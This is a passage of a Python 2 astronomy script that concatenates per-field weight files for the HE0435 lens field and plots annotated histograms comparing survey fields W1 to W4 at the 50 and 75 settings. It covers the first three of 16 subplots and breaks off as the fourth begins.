print("Arguments: \n Lens field: %s \n Original values or samples drawn from P(z) and P(Mstar): %s \n Number of bins: %s \n Radius of each cell: %s \n Limiting i-band magnitude: %s" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))
# NOTE(review): this file mixes Python-2 print statements (below) with
# print(...) calls — it only runs under Python 2.
if (str(sys.argv[2]) == "samp") or (str(sys.argv[2]) == "tab"):
    print "This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000..."
start_time = time.time()
# Read the index of per-cell weight files for the 50%-completeness run.
with open('fieldsforhist50try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:
    listfields = f.readlines()
# For each survey field W1..W4, concatenate the contents of every listed
# file whose name contains that field tag into one fieldshist*_50 file.
# The slice x[0:len(listfields[0])-1] strips the trailing newline — assumes
# every listed filename has the same length as the first entry; TODO confirm.
with open('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W1" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
# Same concatenation for field W2.
with open('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W2" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
# Same concatenation for field W3.
with open('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W3" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
# Same concatenation for field W4.
with open('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W4" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
# Repeat the whole procedure for the 75%-completeness index.
with open('fieldsforhist75try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:
    listfields = f.readlines()
with open('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W1" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
with open('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W2" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
with open('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W3" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
with open('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
    for i in range(len(listfields)):
        if "W4" in [x[0:len(listfields[0])-1] for x in listfields][i]:
            with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
                outfile.write(infile.read())
cols=1
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
x = linspace(0,2,500)
plt.subplot(451)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(451)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{gal}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 1
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=3
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
x = linspace(0,2,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(452)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# --- Annotations for subplot 2 (axes 452): label each histogram curve with
# "peak, mean, median".  The n_q_* / bins_q_* histogram outputs and the q_*
# samples used here are computed earlier in the script, before this section.
# NOTE(review): the commented-out lines below are an older variant that
# estimated the peak from a Gaussian fit (gauss_q_*) instead of the binned
# histogram maximum; kept for reference.
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(452)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{1}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 2
# Progress report: fraction of points per field surviving the q < 10 cut.
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
# --- Subplot 3 of 16: zeta_z statistic, read from column `cols` of the
# per-field fieldshist* list files.  For each CFHTLenS field (W1-W4) and
# each aperture (50/75): load the statistic, keep only values passing the
# q < 10 outlier cut, histogram it, and annotate peak / mean / median.
cols=5
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# Draw each normalized histogram once and keep the (counts, bin edges) for
# the annotations.  (The original issued every plt.hist call a second time
# with identical arguments, which only overplotted the same lines and
# duplicated legend labels; those redundant calls are removed.)
ax = plt.subplot(453)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# Per-curve "peak, mean, median" labels; only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{z}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 3
# Progress report: fraction of points per field surviving the q < 10 cut.
# (Parenthesized print is valid in both Python 2 and 3.)
print("finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size))
# --- Subplot 4 of 16: zeta_M statistic, read from column `cols` of the
# per-field fieldshist* list files.  Same pipeline as the other subplots:
# load, apply the q < 10 cut, histogram, annotate peak / mean / median.
cols=7
